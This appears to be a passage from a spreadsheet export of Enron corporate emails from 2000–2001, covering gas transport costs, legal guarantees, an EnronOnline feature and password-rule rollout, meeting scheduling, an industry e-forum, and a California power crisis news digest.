I've corrected  the transport and fuel deducts in sitara and e-mailed the _x000D_
EOTT  folks._x000D_
_x000D_
Thanks_x000D_
_x000D_
Susan_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Stevens_Hollister@eott.com on 12/12/2000 09:10:36 AM_x000D_
To: Susan.W.Pereira@enron.com_x000D_
cc: Jeananne_Heck@eott.com, hpetter@flash.net _x000D_
Subject: Transportation Cost increase_x000D_
_x000D_
_x000D_
_x000D_
Susan,_x000D_
_x000D_
Jane Saladino, an accountant with Enron, called the EOTT accountant to let_x000D_
her know that the transportation on Bazor Ridge should be $.25, rather than_x000D_
$.24.  Is this correct?_x000D_
_x000D_
Stevens_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 8 Jan 2001 04:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>ENSIDE Newsmagazine</t>
  </si>
  <si>
    <t xml:space="preserve">CP, Please forward her a bio, to save time, and schedule the time with her._x000D_
thanks,_x000D_
'm_x000D_
---------------------- Forwarded by Mike McConnell/HOU/ECT on 01/08/2001 _x000D_
12:37 PM ---------------------------_x000D_
_x000D_
_x000D_
Kathie Grabstald_x000D_
01/08/2001 10:40 AM_x000D_
To: Mike McConnell/HOU/ECT@ECT_x000D_
cc: Cathy Phillips/HOU/ECT@ECT _x000D_
Subject: ENSIDE Newsmagazine_x000D_
_x000D_
Good Morning, Mike!_x000D_
_x000D_
Mark Frevert has requested that we continue our efforts to profile the _x000D_
various officers of EA, EGM and EIM in the newsmagazine.  As the Editor of _x000D_
the ENSIDE,  I would like to schedule an appointment to interview you.  The _x000D_
next issue is set for publication in February and I need only 30 minutes of _x000D_
your time.  I have attached some possible topics for us to discuss._x000D_
_x000D_
I look forward to meeting with you.  Please call me if you have any questions._x000D_
_x000D_
Kathie Grabstald_x000D_
Public Relations_x000D_
x 3-9610_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 14 Nov 2000 12:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mariamarcelle@hotmail.com'})</t>
  </si>
  <si>
    <t>frozenset({'jarnold@enron.com'})</t>
  </si>
  <si>
    <t>bank wire wsex</t>
  </si>
  <si>
    <t>Dear Mr.. Lavorato,_x000D_
_x000D_
The $1500 that you sent to us in October, has not been credited to our_x000D_
account.If those funds were sent through AM TRADE INTERNATIONAL, you need to_x000D_
have your bank send an amendment message stating that the respective funds_x000D_
are intended for final credit to World Sports Exchange/ ACCT # 12307915._x000D_
_x000D_
Most likely, those funds are sitting at the Antigua Overseas Bank._x000D_
_x000D_
2. Another suggestion would be to call back those funds since the_x000D_
beneficiary is not in receipt of payment, and resend it through the new_x000D_
instruction as per our website.This method is guaranteed more efficient._x000D_
_x000D_
For any further questions, please call the accounts department at WSEX._x000D_
_x000D_
REGARDS_x000D_
MARIA._x000D_
Accounts Manager_x000D_
__________________________________________________________________________x000D_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com._x000D_
_x000D_
Share information about yourself, create your own public profile at_x000D_
http://profiles.msn.com.</t>
  </si>
  <si>
    <t>Thu, 17 May 2001 00:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'shanna.boudreaux@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'susan.pereira@enron.com', 'judy.townsend@enron.com'})</t>
  </si>
  <si>
    <t>TETCO Imbalances 5/17/01</t>
  </si>
  <si>
    <t xml:space="preserve">Take a look at this one.  I believe this is what ya'll want to see._x000D_
_x000D_
Shanna_x000D_
</t>
  </si>
  <si>
    <t>Tue, 1 May 2001 02:44:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: FW: Gulf Guarantee for Enron</t>
  </si>
  <si>
    <t xml:space="preserve">Russell, _x000D_
_x000D_
Because it covers swaps, a financial lawyer needs to look at it.  Even when _x000D_
the primary exposure is physical._x000D_
_x000D_
Stacy_x000D_
_x000D_
_x000D_
_x000D_
	Russell Diamond/ENRON@enronXgate_x000D_
	05/01/2001 07:46 AM_x000D_
		 _x000D_
		 To: Stacy E Dickson/HOU/ECT@ECT_x000D_
		 cc: Randy Otto/CAL/ECT@ECT_x000D_
		 Subject: FW: Gulf Guarantee for Enron_x000D_
_x000D_
Stacy,_x000D_
Attached is a draft guaranty from Gulf Resources to cover physical _x000D_
transactions between their sub, Crestar Energy Marketing and ENA.  Can you _x000D_
please review this format and provide your comments.  The guaranty covers _x000D_
purchase/sale and swap transactions, although our primary exposure is only _x000D_
physical natural gas.  I am not sure if one of the financial attorney's needs _x000D_
to look at this too_x000D_
_x000D_
Thanks_x000D_
Russell_x000D_
_x000D_
_x000D_
**Randy, Take a look at the guaranty and the types of transactions we have _x000D_
with this counterparty to understand the need for the guaranty._x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Rick_Miller@gulf.ca@ENRON _x000D_
[mailto:IMCEANOTES-Rick+5FMiller+40gulf+2Eca+40ENRON@ENRON.com] _x000D_
Sent: Monday, April 30, 2001 9:34 AM_x000D_
To: Diamond, Russell_x000D_
Subject: Gulf Guarantee for Enron_x000D_
_x000D_
Russell:_x000D_
_x000D_
I understand from Jeff McPhail of our marketing group that Enron is looking _x000D_
for_x000D_
a parental guarantee from Gulf Canada for one of our subsidiaries - Crestar_x000D_
Energy Marketing Corp.  (Jeff did not mention the subsidiary Enron was_x000D_
requesting to have guaranteed).  I am enclosing a form of parental guarantee_x000D_
that we have signed in the past.  Please review and call with any questions._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Rick Miller_x000D_
Assistant Treasurer_x000D_
403-233-3015_x000D_
_x000D_
_x000D_
(See attached file: Enron Guarantee.doc)_x000D_
_x000D_
******* End *******_x000D_
_x000D_
 - Enron Guarantee.doc_x000D_
</t>
  </si>
  <si>
    <t>Fri, 17 Aug 2001 13:46:39 -0700 (PDT)</t>
  </si>
  <si>
    <t>NEW ENRONONLINE FUNCTIONALITY</t>
  </si>
  <si>
    <t>In order to continually develop and make improvements to the functionality of EnronOnline we are rolling out several changes tonight, which will be in effect on Monday August 20, 2001. Some of these changes will affect Stack Manager while others affect the Website. A summary of these changes is listed below._x000D_
_x000D_
Stack Manager Changes_x000D_
_x000D_
Top of Stack limit orders - This feature will allow the price submitted via limit orders to be displayed on the website if their bid or offer is better than the trader's stack price. Stack Manger will list the price and the names of counterparties submitting such orders on the  floated stack window.  Orders will be queued by price and time stamp. When a counterparty trades on a " Top of Stack Entry" it will create back to back transactions; one between Enron and the counterparty submitting the order, and the other between Enron and the counterparty clicking on the website._x000D_
_x000D_
In order to turn on this functionality select the " Allowed Top of Stack" option, in the Orders section of the product properties page.  If regular limit order functionality is desired the "Allowed"  option should be selected._x000D_
_x000D_
Please note that this feature will be released in a disabled mode and will be turned on sometime next week after determining which business units want to roll this out._x000D_
_x000D_
Restricted Top of Stack limit orders - This feature will allow the price submitted only by internal traders via limit orders to be displayed on the website if their bid or offer is better than the trader's stack price. Stack Manger will list price and the names of counterparties submitting such orders on the  floated stack window.  Orders will be queued by price and time stamp. When a counterparty trades on a " Top of Stack Entry" it will create back to back transactions one between Enron and the counterparty submitting the order, and the other between Enron and the counterparty clicking on the website._x000D_
_x000D_
In order to turn on this functionality select the " allowed as Restricted Top of Stack" option, in the Orders section of the product properties page.  If regular limit order functionality is desired the "Allowed"  option should be selected. If a product has active orders against it you will not be able to select the "Restricted Top of Stack" feature._x000D_
_x000D_
Advanced Filtering Ability on All Products Tab -  Drop down filtering capability is now available for each field in the All Products tab in stack manager. In order to filter click on the arrow next to the field title. A drop down box with a list of attributes will appear. Highlight the attribute by which you wish to filter. To turn off the filter click on the arrow and select the " All" option from the drop down box._x000D_
_x000D_
_x000D_
Website Changes_x000D_
_x000D_
New Submission Screen for Restricted Top of Stack Limit Orders -  The submission screen for  products that allow  Top of Stack or Restricted Top of Stack limit orders is as follows._x000D_
 _x000D_
_x000D_
The submit button on the left makes a submission for a normal transaction, while the button on the right will submit as a limit order.  In case of the Restricted Top of Stack limit orders only internal traders will see the new submission box. _x000D_
_x000D_
Price of Limit Orders _x000D_
_x000D_
Modify Limit Orders_x000D_
 Customers now have the ability to modify the price of any active order. In order to do so highlight the order to be modified and use the plus or minus sign next to the price field on  at the top of the "Today's Orders" section. The price will move up or down in the same increments as the tick size for that product. Once the price is at the desired level click the "Set" button and the price will be modified. Another way to modify the price on a limit order is to click on the price field on a particular limit order.  You will see a box with plus, minus and set buttons that allow you to modify that order._x000D_
_x000D_
Expiration time for Limit Orders_x000D_
Customers can now place limit orders with expiration times of up to 30 days. Currently they may place orders for only up to 12 hours._x000D_
_x000D_
Float the Today's Orders Section_x000D_
You can now float the " Limit Order " section. In order to do so, right click in the "Today's Orders " section and select the float window option. In order to make the window " Stay On Top " right click on the floated window and select the stay on top option._x000D_
_x000D_
Mid Market Client - Mid market originators will now have the ability to transact on behalf of their customers, while including their desired margin on the trade, on EnronOnline products. In order to do so Click on the bid or offer price, a customised submission window will appear.  Select the counterparty for whom you wish to transact from a drop down list , enter the desired customer price and margin and click submit. For example if a customer wants to buy Nymex Sep 01 at 3.36 and you wish to have a 1 cent margin, please enter 3.36 as the desired price and 0.01 as the margin. The system will trade the order when the EnronOnline offer for Nymex Sep 01 is at 3.35, book the trade at 3.36 and record the 0.01 origination amount._x000D_
_x000D_
In order to be set up to use this functionality. Please call the EnronOnline Product Control Group._x000D_
_x000D_
Changes to Website Passwords - As an added security measure, which has been requested by many customers, some new password rules have been instituted. First, the password cannot be equal to the login ID. Second, each user will be prompted to change his password every 90 days. These rules apply to all website passwords for both internal and external users._x000D_
_x000D_
_x000D_
Please note  Stack Manager changes will be available all traders as of Monday August 20, 2001. The changes to the website will be rolled out to a few internal users on Monday with the rest of the internal users being upgraded Monday night, and external users by the end of the week.  Over the next couple of weeks all users will be prompted to change their website passwords._x000D_
_x000D_
If you have any questions regarding these changes please contact me at 713-853-1787._x000D_
_x000D_
Savita Puthigai_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&lt;Embedded Paintbrush Picture&gt;</t>
  </si>
  <si>
    <t>Tue, 9 May 2000 10:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.keiser@enron.com'})</t>
  </si>
  <si>
    <t>Internal meeting to discuss Interest Rate Locks, Rod's office</t>
  </si>
  <si>
    <t>Internal discussion before we discuss with Gruber next week.</t>
  </si>
  <si>
    <t>Fri, 20 Oct 2000 03:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'alan.aronowitz@enron.com', 'daniel.rogers@enron.com', 'frank.sayre@enron.com'})</t>
  </si>
  <si>
    <t>Organizational Chart</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is our organizational chart which will be prettied up over time._x000D_
</t>
  </si>
  <si>
    <t>Mon, 16 Oct 2000 08:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Group Lists</t>
  </si>
  <si>
    <t xml:space="preserve">Thank you._x000D_
_x000D_
_x000D_
_x000D_
	Jacqueline Kelly &lt;JKelly@FairIsaac.com&gt;_x000D_
	10/16/2000 03:31 PM_x000D_
		 _x000D_
		 To: "'Madhur Duggar'" &lt;duggar@haas.berkeley.edu&gt;_x000D_
		 cc: "Kimberely Kupiecki (E-mail)" &lt;kupiecki@haas.berkeley.edu&gt;, "Jeff _x000D_
Dasovich (E-mail)" &lt;dasovich@haas.berkeley.edu&gt;, "Ted Chin (E-mail)" _x000D_
&lt;tedchin@hotmail.com&gt;_x000D_
		 Subject: RE: Group Lists_x000D_
_x000D_
Group List for group project, 203-2 class:_x000D_
Kimberley Kupiecki_x000D_
Jeff Dasovich_x000D_
Ted Chin_x000D_
Jacqueline Kelly_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Madhur Duggar [mailto:duggar@haas.berkeley.edu]_x000D_
Sent: Monday, October 16, 2000 12:55 PM_x000D_
To: e203-1@haas.berkeley.edu; e203-2@haas.berkeley.edu_x000D_
Subject: Group Lists_x000D_
_x000D_
_x000D_
Hi,_x000D_
Just a reminder that those of you who have not yet handed me a group list _x000D_
for the project, need to do so soon, as the deadline is approaching._x000D_
_x000D_
Madhur_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 16 Jul 2001 07:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mark.palmer@enron.com', 'skean@enron.com'})</t>
  </si>
  <si>
    <t>Update on GENIE</t>
  </si>
  <si>
    <t>Hello - _x000D_
_x000D_
I have included an update on GENIE but I am starting with a list of action _x000D_
items needed by you and mentioned in more detail below:_x000D_
Changes or approval on the letter to the Office of the Chairman of EWS, EES _x000D_
and ETS from Steve._x000D_
Steve, please brief Ken so we can get both events on his schedule.  He still _x000D_
has other commitments that need to be moved._x000D_
Changes or approval on the panelist/invitees list ASAP._x000D_
_x000D_
Mailing and Acceptances_x000D_
The mailings to the steering committee and commentators went out last Wed. _x000D_
and Thurs. We are rapidly receiving emails and phone responses.  I will send _x000D_
a weekly update of the results. Within the next week, I may request that top _x000D_
Enron officials make a personal invitation to key attendees that are _x000D_
unresponsive. _x000D_
_x000D_
October event Attendees/Panelists_x000D_
Please look over the excel spreadsheet of proposed attendees ASAP (in your _x000D_
binder from our last meeting). We must start getting the invitations out _x000D_
soon. Feel free to add names you do not see on the list. We will be taking _x000D_
the same approach with the business units once they are notified of this _x000D_
event. _x000D_
_x000D_
Memos_x000D_
Rick will be sending out a memo about GENIE to his direct reports today. I _x000D_
will be briefing them in more detail on his call on Thursday, making sure _x000D_
that they are aware of those we asking to participate as part of the Steering _x000D_
Committee and commentators. They will also be given the opportunity to _x000D_
suggest general attendees._x000D_
_x000D_
I have attached a memo that Steve can send to the Office of the Chair of EWS, _x000D_
EES and ETS. _x000D_
_x000D_
_x000D_
Binders_x000D_
I created a briefing binder for both Sherrie and Joannie in Jeff's office and _x000D_
will be doing so for Ken once he is aware of the initiative. Once the BU's _x000D_
units are on board, I can do the same for the Office of the Chairman in those _x000D_
groups.  I will keep them all updated on a weekly basis._x000D_
_x000D_
     Let me know any thoughts, comments or questions. Thanks, MSA</t>
  </si>
  <si>
    <t>Fri, 27 Apr 2001 12:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'darnellmo@aol.com'})</t>
  </si>
  <si>
    <t>frozenset({'darron.c.giron@enron.com', 'yhaynes@mindspring.com', 'cgiron@mindspring.com', 'dgiron1@pdq.net.kristi.giron'})</t>
  </si>
  <si>
    <t>DC Trip</t>
  </si>
  <si>
    <t>Just a reminder to you that I will be in DC from Sunday, April 29 -Friday  _x000D_
nite, May4. ?I have been issued a laptop that has a NYLF network system and  _x000D_
can be contacted at dmoore@nylf.org./ ?I am taking the laptop with you. ?My  _x000D_
new job is going well......55 applicants for 18 positions. ?I start  _x000D_
interviewing when I get back from DC. ?MOM</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 01:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: "Transfer" provision</t>
  </si>
  <si>
    <t xml:space="preserve">that sounds good._x000D_
_x000D_
_x000D_
From: Sara Shackleton on 04/25/2001 09:06 AM_x000D_
To: Tracy Ngo/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: RE: "Transfer" provision  _x000D_
_x000D_
How about 11 am CST?  I forgot that I have an 11:30 on Monday._x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
_x000D_
_x000D_
_x000D_
	Tracy Ngo_x000D_
	04/25/2001 10:20 AM_x000D_
		_x000D_
		 To: Sara Shackleton/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: RE: "Transfer" provision_x000D_
_x000D_
How about the same time on Monday?  10am PST; 12 noon CST; 1 pm EST?_x000D_
_x000D_
I'll put you guys down for 10am my time...unless I hear different._x000D_
_x000D_
Thanks,_x000D_
Tracy_x000D_
_x000D_
_x000D_
_x000D_
From: Sara Shackleton on 04/25/2001 07:55 AM_x000D_
To: Tracy Ngo/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: RE: "Transfer" provision_x000D_
_x000D_
Tracy:  It's fine with me.  Let's schedule a time next week on Monday.  The _x000D_
lawyers will be gone Wed - Fri next week.  Name a time._x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 04/25/2001 09:52 AM -----_x000D_
_x000D_
	"Yaish, Yair (OGC)" &lt;YYaish@exchange.ml.com&gt;_x000D_
	04/24/2001 07:29 PM_x000D_
		 _x000D_
		 To: "'Sara.Shackleton@enron.com'" &lt;Sara.Shackleton@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: RE: "Transfer" provision_x000D_
_x000D_
_x000D_
I am prapring for a trip to Denver tomorrow.  Can we push this off until next _x000D_
week._x000D_
_x000D_
Yair Yaish_x000D_
Office of General Counsel_x000D_
AEGM_x000D_
2-7955_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Sara.Shackleton@enron.com [mailto:Sara.Shackleton@enron.com]_x000D_
Sent: Tuesday, April 24, 2001 7:44 PM_x000D_
To: yyaish@exchange.ml.com_x000D_
Cc: Tracy.Ngo@enron.com_x000D_
Subject: "Transfer" provision_x000D_
_x000D_
_x000D_
Yair:_x000D_
_x000D_
Tracy and I would like to discuss the "Transfer" issue with you tomorrow,_x000D_
if possible.  We think this should be a short discussion (maybe 10_x000D_
minutes).  How is 1 pm NY time, tomorrow Wednesday April 25?  This seems to_x000D_
be the most convenient for both of us, but we will entertain times before 3_x000D_
pm NY time._x000D_
_x000D_
Would you please email your response?_x000D_
_x000D_
Thanks._x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 27 Sep 2000 06:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lesli.campbell@enron.com'})</t>
  </si>
  <si>
    <t>Re: Deal # Q03252</t>
  </si>
  <si>
    <t>I don't do tagg but I'll give to the appropriate person</t>
  </si>
  <si>
    <t>Thu, 2 Nov 2000 05:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lmiller@eei.org'})</t>
  </si>
  <si>
    <t>Will California's Restructuring Tremors Be Felt in Your Region?</t>
  </si>
  <si>
    <t>Will California's Restructuring Tremors Be Felt in Your Region?_x000D_
,Copyright 2000 EEI.  All rights reserved._x000D_
_x000D_
EEI's State Restructuring Service is proud to present an Internet E-Forum to _x000D_
investigate whether the problems of California could occur in other parts of _x000D_
the country._x000D_
_x000D_
The California "restructuring earthquake" is marked by the doubling of some _x000D_
electric bills, multi-billion dollar utility under collections, electric _x000D_
reserve margin problems, and consumer outrage.  While these problems are the _x000D_
result of numerous factors, some may be replicated in other parts of the _x000D_
country.  This E-Forum will look at six regions of the county to see if the _x000D_
same "tremors" will be felt in those regions and if not, why not.  Our _x000D_
speakers will address the following questions:_x000D_
_x000D_
Will your region see price spikes next summer?_x000D_
_x000D_
What reliability challenges might your region experience next year?_x000D_
_x000D_
Do any changes in state or federal laws or regulations need to be made?_x000D_
_x000D_
How will retail markets be impacted by other factors such as, market _x000D_
structure, dependence on a spot market, high gas prices, and environmental _x000D_
restrictions?_x000D_
_x000D_
To address these questions we have:_x000D_
_x000D_
California  - Dr. John Jurewitz, Dir, Regulatory Policy, SoCal Edison_x000D_
ERCOT  - Mike McCall, VP, Regulatory Affairs, TXU_x000D_
PJM  - David Pratzon, Consultant, Exelon Power Team_x000D_
Mid -West  - Corun Gagatsis, Sr Regulatory Strategist, Detroit Edison_x000D_
New England  - Gary Simon, Sr VP, Enterprise, Development and Analysis, NU_x000D_
New York  - William L. Jaeger, Chief Eng., Transmission Planning, ConEd_x000D_
_x000D_
Our guest moderator is Chuck Gray, Exec. Dir., National Association of _x000D_
Regulatory Utility Commissioners_x000D_
_x000D_
To provide questions and commentary we have Dr. John H. Landon, Principal, _x000D_
Dir. Energy Practice Analysis Group/Economics_x000D_
_x000D_
November 17, 2000 1 p.m. ET_x000D_
Note:  Please block a 2-hour time slot for the E-Forum.  We expect the _x000D_
program to take at least one hour.  Q&amp;A at the conclusion of the E-Forum _x000D_
could take up to an additional hour._x000D_
_x000D_
Registration Cut-off and Cancellation Policy: All registrations must be _x000D_
received by November 15, 2000.  Substitutions may be made at any time, _x000D_
however, no refunds will be made for cancellations received after November _x000D_
15, 2000._x000D_
_x000D_
Registration Cost:_x000D_
EEI/NARUC/NCSL Members: $50.00 / Associates $75 / Non-members:  $100.00_x000D_
------------------------------------------------------------------------------_x000D_
--------------_x000D_
FOR MORE INFORMATION AND/OR TO REGISTER, ACCESS THE FOLLOWING URL: _x000D_
www.eei.org/resources/meetings/forums/_x000D_
------------------------------------------------------------------------------_x000D_
--------------_x000D_
E-Forums are real-time, interactive presentations, created, produced and _x000D_
distributed by EEI.  The visual presentation is delivered over the Internet, _x000D_
while the audio portion is delivered through a conference phone call.  You _x000D_
can participate in an E-Forum using any computer with Internet access and a _x000D_
telephone._x000D_
_x000D_
To fully participate in the E-Forum, you will need:_x000D_
_x000D_
- Access to the Internet and a web browser._x000D_
- A separate voice phone line and a phone to dial into the audio conference _x000D_
call.  Cell phones can be used._x000D_
- Upon confirmation of your registration, you will be given complete _x000D_
instructions including the URL (with Password/ID) and a the conference phone _x000D_
number._x000D_
- Slides used in the presentation will also be e-mailed to you prior to the _x000D_
forum and will soon be available over the Internet._x000D_
_x000D_
For more information on EEI's E-Forums, contact Mike Oldak, Director, State _x000D_
Competitive and Regulatory Policy at 202-508-5523 moldak@eei.org or Leigh _x000D_
Miller, Coordinator at (202) 508-5522 lmiller@eei.org_x000D_
_x000D_
For more information on EEI's State Restructuring Service, contact Norm _x000D_
Jenks, Manager, Regulation and Competitive Analysis 202-508-5533 _x000D_
njenks@eei.org_x000D_
_x000D_
,Copyright 2000 by the Edison Electric Institute_x000D_
All rights reserved under U.S. and foreign law, treaties and conventions.  No _x000D_
part of this work may be distributed, redistributed, reproduced or copied in _x000D_
any form or by any means - graphic, electronic or mechanical, including _x000D_
photocopying, recording, taping, or information storage and retrieval systems _x000D_
without written permission of the publisher</t>
  </si>
  <si>
    <t>Fri, 9 Jun 2000 05:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeffreye.smith@ps.ge.com'})</t>
  </si>
  <si>
    <t>Letter Agreement</t>
  </si>
  <si>
    <t>Jeff:_x000D_
_x000D_
Here's a draft for your review:_x000D_
_x000D_
_x000D_
_x000D_
I suggest that the payment terms for the offshore contract require the intial _x000D_
payment to be made within 7 business days of execution.  That way, we can _x000D_
sign this up next week._x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Mon, 16 Oct 2000 03:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: ISDA w/ Australian bank</t>
  </si>
  <si>
    <t xml:space="preserve">Stephanie worked on this.  Stephanie, can you get with Bob..._x000D_
_x000D_
_x000D_
_x000D_
	Robert Bruce@ENRON_x000D_
	Sent by: Robert Bruce@ENRON_x000D_
	10/16/2000 10:48 AM_x000D_
		 _x000D_
		 To: Tana Jones/HOU/ECT@ECT, Samantha Boyd/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: ISDA w/ Australian bank_x000D_
_x000D_
Tana, Sam and I are putting together a draft ISDA between ENA and an _x000D_
Australian bank -- I understand from Sara that you worked with her on a _x000D_
recent ISDA w/ James Hardie, another Australian bank._x000D_
_x000D_
It does not appear from the CP has delivered its legal opinion to us -- _x000D_
however, do you have a draft of legal opinion that Sam could use as a _x000D_
template?  if so, could you e-mail it to Sam?_x000D_
_x000D_
We have been asked to get a draft out on a rush basis so any help you can _x000D_
provide in expediting this would be appreciated -- thanks, Bob_x000D_
_x000D_
_x000D_
Robert E. Bruce_x000D_
Senior Counsel_x000D_
Enron North America Corp._x000D_
T (713) 345-7780_x000D_
F (713) 646-3393_x000D_
robert.bruce@enron.com_x000D_
</t>
  </si>
  <si>
    <t>Wed, 23 May 2001 08:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Summary of Core/Noncore Analysis</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Jeff Dasovich/NA/Enron on 05/23/2001 03:44 PM -----_x000D_
_x000D_
	Jeff Dasovich_x000D_
	Sent by: Jeff Dasovich_x000D_
	05/23/2001 03:44 PM_x000D_
		_x000D_
		 To: Jeff Dasovich/NA/Enron@Enron_x000D_
		 cc: Maureen McVicker/NA/Enron@ENRON, Rosalee Fleming/Enron@EnronXGate, Steve _x000D_
Kean_x000D_
		 Subject: Re: Summary of Core/Noncore Analysis_x000D_
_x000D_
My apologies, Rosalee.  Not sure what happened.  Let's try again.  Let me _x000D_
know if you're still having problems._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 18 Jul 2001 03:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sgovenar@govadv.com', 'amy.kim@enron.com', 'janet.butler@enron.com', 'alex.parsons@enron.com', 'pat.shortridge@enron.com', 'alan.comnes@enron.com', 'tom.briggs@enron.com', 'mark.schroeder@enron.com', "nick.o'day@enron.com", 'stella.chan@enron.com', 'markus.fiala@enron.com', 'linda.robertson@enron.com', 'peter.styles@enron.com', 'melinda.pharms@enron.com', 'ban.sharma@enron.com', 'karen.denne@enron.com', 'john.shelk@enron.com', 'syamane@marathon-com.com', 'michael.brown@enron.com', 'luiz.maurer@enron.com', 'robert.neustaedter@enron.com', 'ken@kdscommunications.com', 'marcus.dotson@enron.com', 'chris.holmes@enron.com', 'hgovenar@govadv.com', 'rob.bradley@enron.com', 'lipsen@cisco.com', 'jeannie.mandelker@enron.com', 'mona.petrochko@enron.com', 'carin.nersesian@enron.com', 'lora.sullivan@enron.com', 'chris.long@enron.com', 'ralph@censtrat.com', 'shirley.hudler@enron.com', 'susan.mara@enron.com', 'richard.shapiro@enron.com', 'larry.decker@enron.com', 'peggy.mahoney@enron.com', 'rlichtenstein@marathon-com.com', 'joseph.alamo@enron.com', 'jennifer.thome@enron.com', 'steven.kean@enron.com', 'mary.schoen@enron.com', 'lamar.frazier@enron.com', 'kathleen.sullivan@enron.com', 'mike.roan@enron.com', 'shelley.corman@enron.com', 'bryan.seyfried@enron.com', 'filuntz@aol.com', 'kurt.lindahl@enron.com', 'andrew.morrison@enron.com', 'john.sherriff@enron.com', 'bhansen@lhom.com', 'janel.guerrero@enron.com', 'jkradin@marathon-com.com', 'elizabeth.linnell@enron.com', 'roberta.staehlin@enron.com', 'karen.moore@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'lysa.tracy@enron.com', 'mark.palmer@enron.com', 'evan.hughes@enron.com', 'john.neslage@enron.com', 'ann.schmidt@enron.com', 'joe.hartsoe@enron.com'})</t>
  </si>
  <si>
    <t>Please see the following articles:_x000D_
_x000D_
Sac Bee, Wed, 7/18: Lawmakers debate efforts to save Edison:=20_x000D_
Competing bills range from a straight bailout to purchase of transmission=_x000D_
=20_x000D_
lines_x000D_
Sac Bee, Wed, 7/18: PG&amp;E sues state over seizure of long-term power contrac=_x000D_
ts=20_x000D_
Sac Bee, Wed, 7/18: Energy Digest: Advocate attacks utility rescue plan_x000D_
Sac Bee, Wed, 7/18: Hour of decision: Who will pay for costly power of past=_x000D_
,=20_x000D_
future?   (Editorial)_x000D_
SD Union, Tues, 7/17: Utility sues state seeking millions in seized power=_x000D_
=20_x000D_
contracts=20_x000D_
LA Times, Wed, 7/18: PG&amp;E Sues State Over Contracts_x000D_
SF Chron, Wed, 7/18: Consumer prices up as energy costs moderate=20_x000D_
SF Chron, Wed, 7/18: Contra Costa may upgrade 9 buildings=20_x000D_
$1.7 million earmarked for conservation=20_x000D_
SF Chron, Wed, 7/18: Lawmakers devise rival bailout plans for Edison=20_x000D_
Push to come up with alternative to bankruptcy before recess=20_x000D_
SF Chron, Wed, 7/18: News briefs on the California power crisis=20_x000D_
SF Chron, Wed, 7/18: State's largest utility sues state seeking millions in=_x000D_
=20_x000D_
power contracts seized by governor=20_x000D_
Mercury News, Wed, 7/18: Surplus state power sold at loss=20_x000D_
Mercury News, Wed, 7/18:  Light bulb moment (Commentary)_x000D_
LA Times, Wed, 7/18: California Trading, Wholesale Power Boost Duke's=20_x000D_
Earnings 27%_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
----------------------------------------------------_x000D_
Lawmakers debate efforts to save Edison: Competing bills range from a=20_x000D_
straight bailout to purchase of transmission lines.=20_x000D_
By Jim Sanders_x000D_
Bee Capitol Bureau_x000D_
(Published July 18, 2001)=20_x000D_
Divided legislators began wrestling Tuesday with competing proposals to kee=_x000D_
p=20_x000D_
one of California's largest private utilities, Southern California Edison,=_x000D_
=20_x000D_
from going bankrupt.=20_x000D_
Pressure is rising as Edison continues to struggle with more than $3.5=20_x000D_
billion in debt and a tentative plan by Gov. Gray Davis to buy the utility'=_x000D_
s=20_x000D_
